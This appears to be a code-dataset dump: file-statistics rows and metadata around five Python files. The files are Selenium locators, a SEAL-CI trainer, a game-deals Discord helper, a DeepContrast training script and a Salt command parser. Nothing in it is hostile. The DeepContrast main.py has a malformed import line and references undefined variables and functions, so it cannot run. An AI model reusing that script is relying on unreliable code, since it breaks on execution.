| 23.947368 | 108 | 0.635165 | 48 | 455 | 5.895833 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090643 | 0.248352 | 455 | 18 | 109 | 25.277778 | 0.736842 | 0.098901 | 0 | 0 | 1 | 0 | 0.205882 | 0.056373 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
288158558cb5b27285bd59e2a01c288a73ce1d28 | 661 | py | Python | src/values/locators.py | Jorge644/python-fravega-test | bbfa170fd38bb1ea8c18baccf456ec0f7ca17bc4 | [
"bzip2-1.0.6"
] | null | null | null | src/values/locators.py | Jorge644/python-fravega-test | bbfa170fd38bb1ea8c18baccf456ec0f7ca17bc4 | [
"bzip2-1.0.6"
] | null | null | null | src/values/locators.py | Jorge644/python-fravega-test | bbfa170fd38bb1ea8c18baccf456ec0f7ca17bc4 | [
"bzip2-1.0.6"
] | null | null | null | from selenium.webdriver.common.by import By
search_locator = (By.XPATH , "//input[@placeholder='Buscar productos']")
search_button_locator = (By.CSS_SELECTOR , "button[class*='InputBar']")
all_brands_locator = (By.XPATH, "//li[@name='brandsFilter'] //a[text()='Ver todas']")
find_specify_brand_locator = (By.XPATH, "//div[@class='ant-modal-body'] //label[text()='{}']")
pagination_locator = (By.XPATH, "//ul[@class='ant-pagination']/li")
items_founded_locator = (By.XPATH, "//ul[@name='itemsGrid']/li")
submit_specific_brand_locator = (By.XPATH, "//div[@class='ant-modal-body'] //button[@id='apply']")
title_search_element_locator = (By.CSS_SELECTOR,"//h4")
| 60.090909 | 98 | 0.704992 | 89 | 661 | 5.022472 | 0.52809 | 0.161074 | 0.187919 | 0.089485 | 0.174497 | 0.174497 | 0.174497 | 0.174497 | 0.174497 | 0 | 0 | 0.001623 | 0.068079 | 661 | 10 | 99 | 66.1 | 0.724026 | 0 | 0 | 0 | 0 | 0 | 0.423601 | 0.329803 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2894f5a5d9df5fd28b16ee4d28f62ac750794ff8 | 437 | py | Python | src/main.py | Morteza-Haghshenas/SEAL-CI | 8bb65d00befb58e63044d7727149a0245f52bf9c | [
"MIT"
] | 1 | 2019-12-23T10:03:08.000Z | 2019-12-23T10:03:08.000Z | src/main.py | Morteza-Haghshenas/SEAL-CI | 8bb65d00befb58e63044d7727149a0245f52bf9c | [
"MIT"
] | null | null | null | src/main.py | Morteza-Haghshenas/SEAL-CI | 8bb65d00befb58e63044d7727149a0245f52bf9c | [
"MIT"
] | null | null | null | """Training a SEAL-CI model."""
import torch
from utils import tab_printer
from seal import SEALCITrainer
from param_parser import parameter_parser
def main():
"""
Parsing command line parameters, reading data.
Fitting and scoring a SEAL-CI model.
"""
args = parameter_parser()
tab_printer(args)
trainer = SEALCITrainer(args)
trainer.fit()
trainer.score()
if __name__ == "__main__":
main()
| 20.809524 | 50 | 0.686499 | 54 | 437 | 5.314815 | 0.592593 | 0.034843 | 0.04878 | 0.083624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217391 | 437 | 20 | 51 | 21.85 | 0.839181 | 0.249428 | 0 | 0 | 0 | 0 | 0.026403 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.416667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
289823656a6b99b341cc27d6743090e32fea1269 | 1,828 | py | Python | cogs/helpers/gamedeals.py | santoshpanna/Discord-Bot | 4757a5899dede946a8e409604d230ddc77626d41 | [
"MIT"
] | null | null | null | cogs/helpers/gamedeals.py | santoshpanna/Discord-Bot | 4757a5899dede946a8e409604d230ddc77626d41 | [
"MIT"
] | null | null | null | cogs/helpers/gamedeals.py | santoshpanna/Discord-Bot | 4757a5899dede946a8e409604d230ddc77626d41 | [
"MIT"
] | null | null | null | import re
from common import database, common
# acceptable store list
# TODO - shift to database
stores = ['steampowered.com', 'humblebundle.com', 'epicgames.com', 'reddit.com']
steamlinks = ('steampowered.com/app', 'steampowered.com/bundle', 'steampowered.com/sub')
# removes uri
def removeURI(url):
position = url.find('?')
if position > 0:
url = url[:position]
if url.endswith('/'):
return url[:-1]
return url
def isNotSteamLink(url):
flag = True
count = url.count("http")
if count > 1:
url = url[url.rfind("http"):]
for steam in steamlinks:
if steam in url:
flag = False
return flag
# checks if post is from acceptable store
def isFromAcceptableStore(submission):
for store in stores:
if isinstance(submission, str):
if store in submission:
if 'steampowered.com' in submission and isNotSteamLink(submission):
return False
return True
else:
if store in submission.url:
if 'steampowered.com' in submission.url and isNotSteamLink(submission.url):
return False
return True
return False
# get store link from subtext
def getStoreLink(submission):
links = re.findall(r'https?:\/\/[^\s\<\>\"\)\%\]]+|www\.[^\s\<\>\"\%\)\]]+', submission.selftext)
for link in links:
if isFromAcceptableStore(link):
return removeURI(link)
async def cleaner(bot):
db = database.Database()
masterlog = common.getMasterLog()
masterlog = bot.get_channel(masterlog)
await masterlog.send(f"**Routine**: Purge gamedeals started.")
if db.cleanGameDeal() == common.STATUS.SUCCESS:
await masterlog.send(f"**DB Purge**: Purged gamedeals successfully.")
| 26.114286 | 101 | 0.615427 | 206 | 1,828 | 5.456311 | 0.398058 | 0.080071 | 0.016014 | 0.033808 | 0.051601 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002224 | 0.262035 | 1,828 | 69 | 102 | 26.492754 | 0.830986 | 0.068928 | 0 | 0.111111 | 0 | 0 | 0.173451 | 0.044838 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.088889 | false | 0 | 0.044444 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
289d577d88e7020b4e41872d4ab5a93d68339724 | 4,020 | py | Python | src/new/main.py | AIM-Harvard/DeepConstrast | 0f99f965cd58c63878fac4631572af8f0f3b0269 | [
"MIT"
] | 3 | 2022-02-23T09:05:45.000Z | 2022-02-23T20:18:18.000Z | src/new/main.py | AIM-Harvard/DeepConstrast | 0f99f965cd58c63878fac4631572af8f0f3b0269 | [
"MIT"
] | null | null | null | src/new/main.py | AIM-Harvard/DeepConstrast | 0f99f965cd58c63878fac4631572af8f0f3b0269 | [
"MIT"
] | null | null | null | import os
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as pltimport glob
from time import gmtime, strftime
from datetime import datetime
import timeit
import yaml
from tensorflow.keras.optimizers import Adam
import argparse
from get_data.get_img_dataset import get_img_dataset
from get_data.get_pat_dataset import get_pat_dataset
from get_data.preprocess_data import preprocess_data
from opts import parse_opts
if __name__ == '__main__':
opt = parse_opts()
if opt.root_dir != '':
opt.data_dir = os.path.join(opt.root_dir, opt.data_dir)
opt.pre_data_dir = os.path.join(opt.root_dir, opt.pre_data_dir)
opt.label_dir = os.path.join(opt.root_dir, opt.label_dir)
opt.out_dir = os.path.join(opt.root_dir, opt.out_dir)
opt.pro_data_dir = os.path.join(opt.root_dir, opt.pro_data_dir)
opt.model_dir = os.path.join(opt.root_dir, opt.model_dir)
opt.log_dir = os.path.join(opt.root_dir, opt.log_dir)
opt.train_dir = os.path.join(opt.root_dir, opt.train_dir)
opt.val_dir = os.path.join(opt.root_dir, opt.val_dir)
opt.test_dir = os.path.join(opt.root_dir, opt.test_dir)
if not os.path.exists(pre_data_dir):
os.path.mkdir(pre_data_dir)
if not os.path.exists(out_dir):
os.path.mkdir(out_dir)
if not os.path.exists(model_dir):
os.path.mkdir(model_dir)
if not os.path.exists(log_dir):
os.path.mkdir(log_dir)
if not os.path.exists(train_dir):
os.path.mkdir(train_dir)
if not os.path.exists(val_dir):
os.path.mkdir(val_dir)
if not os.path.exists(test_dir):
os.path.mkdir(test_dir)
dataset(
data_dir=opt.data_dir,
pre_data_dir=opt.pre_data_dir,
pro_data_dir=opt.pro_data_dir,
label_dir=opt.label_dir,
data_exclude=opt.data_exclude,
new_spacing=opt.new_spacing,
crop_shape=opt.crop_shape,
interp_type=opt.interp_type,
run_type=opt.run_type,
slice_range=opt.slice_range)
if not opt.no_train:
# data generator
train_gen = train_generator(
pro_data_dir=opt.pro_data_dir,
batch_size=opt.batch_size)
x_val, y_val, val_gen = val_generator(
pro_data_dir=opt.pro_data_dir,
batch_size=opt.batch_size)
# get model
my_model = get_model(
out_dir=opt.out_dir,
run_model=opt.run_model,
activation=opt.activation,
input_shape=opt.input_shape)
### train model
if opt.optimizer_function == 'adam':
optimizer = Adam(learning_rate=opt.lr)
train(
log_dir=opt.log_dir,
model_dir=opt.model_dir,
model=my_model,
run_model=opt.run_model,
train_gen=train_gen,
val_gen=val_gen,
x_val=x_val,
y_val=y_val,
batch_size=opt.batch_size,
epoch=opt.epoch,
optimizer=optimizer_function,
loss_function=opt.loss_function,
lr=opt.lr)
if not opt.no_test:
for run_type in ['val', 'test']:
loss, acc = evaluate_model(
run_type=run_type,
model_dir=model_dir,
pro_data_dir=pro_data_dir,
saved_model=saved_model,
threshold=0.5,
activation='sigmoid')
# get statistic and plots
get_stats_plots(
out_dir=out_dir,
proj_dir=proj_dir,
run_type=run_type,
run_model=run_model,
loss=None,
acc=None,
saved_model=saved_model,
epoch=epoch,
batch_size=batch_size,
lr=lr,
thr_img=0.5,
thr_prob=0.5,
thr_pos=0.5,
bootstrap=1000)
| 34.358974 | 71 | 0.597761 | 572 | 4,020 | 3.891608 | 0.171329 | 0.078167 | 0.068733 | 0.064241 | 0.318059 | 0.263702 | 0.180144 | 0.169811 | 0.08805 | 0.047619 | 0 | 0.004359 | 0.315174 | 4,020 | 116 | 72 | 34.655172 | 0.804214 | 0.014925 | 0 | 0.104762 | 0 | 0 | 0.006577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
953d9b0ce081e64501bfbda9942c686e4d32a2ea | 3,035 | py | Python | api/utils/input/__init__.py | mmangione/alcali | 6af8c4056c8e9ceed717440551519769ddbbfd3f | [
"MIT"
] | 306 | 2019-05-12T20:16:55.000Z | 2022-03-27T15:00:15.000Z | api/utils/input/__init__.py | mmangione/alcali | 6af8c4056c8e9ceed717440551519769ddbbfd3f | [
"MIT"
] | 340 | 2019-05-27T20:20:44.000Z | 2022-03-17T05:23:57.000Z | api/utils/input/__init__.py | mmangione/alcali | 6af8c4056c8e9ceed717440551519769ddbbfd3f | [
"MIT"
] | 53 | 2019-05-18T00:06:08.000Z | 2022-03-03T17:38:58.000Z | from shlex import split
import json
class RawCommand:
def __init__(self, command, client="local", posix=True, inline=False):
# TODO: check shlex.quote, raw string, etc..
if inline:
self.command = split(command, posix=posix)
else:
self.command = split(command, posix=posix)[1:]
self.options = {"expr_form": "glob"}
self.client = client
def parse(self):
args = self.command
if args[0].startswith("--client"):
self.client = args[0].split("=")[1]
args.pop(0)
low = {"client": self.client}
if self.client.startswith("local"):
if len(args) < 2:
return "Command or target not specified"
# Batch option
low["batch"] = None
if self.client == "local_batch":
batch_index = None
for index, arg in enumerate(args):
if arg in ["-b", "--batch", "--batch-size"]:
low["batch"] = args[index + 1]
batch_index = index
if batch_index:
args.pop(batch_index)
args.pop(batch_index)
# Timeout option
timeout_index = None
for index, arg in enumerate(args):
if arg in ["-t", "--timeout"]:
low["timeout"] = int(args[index + 1])
timeout_index = index
if timeout_index:
args.pop(timeout_index)
args.pop(timeout_index)
# take care of targeting.
target_dict = {
"pcre": ["-E", "--pcre"],
"list": ["-L", "--list"],
"grain": ["-G", "--grain"],
"grain_pcre": ["--grain-pcre"],
"pillar": ["-I", "--pillar"],
"pillar_pcre": ["--pillar-pcre"],
"range": ["-R", "--range"],
"compound": ["-C", "--compound"],
"nodegroup": ["-N", "--nodegroup"],
}
for key, value in target_dict.items():
if args[0] in value:
self.options["expr_form"] = key
args.pop(0)
low["tgt_type"] = self.options["expr_form"]
low["tgt"] = args.pop(0)
low["fun"] = args.pop(0)
low["arg"] = args
elif self.client.startswith("runner") or self.client.startswith("wheel"):
low["fun"] = args.pop(0)
for arg in args:
if "=" in arg:
key, value = arg.split("=", 1)
try:
low[key] = json.loads(value)
except json.JSONDecodeError:
low[key] = value
else:
low.setdefault("arg", []).append(arg)
else:
# This should never happen
return "Client not implemented: {0}".format(self.client)
return [low]
| 34.488636 | 81 | 0.444481 | 304 | 3,035 | 4.361842 | 0.315789 | 0.047511 | 0.030166 | 0.033183 | 0.205128 | 0.184012 | 0.063348 | 0.063348 | 0.063348 | 0.063348 | 0 | 0.008441 | 0.414498 | 3,035 | 87 | 82 | 34.885057 | 0.73776 | 0.039209 | 0 | 0.185714 | 0 | 0 | 0.125773 | 0 | 0 | 0 | 0 | 0.011494 | 0 | 1 | 0.028571 | false | 0 | 0.028571 | 0 | 0.114286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.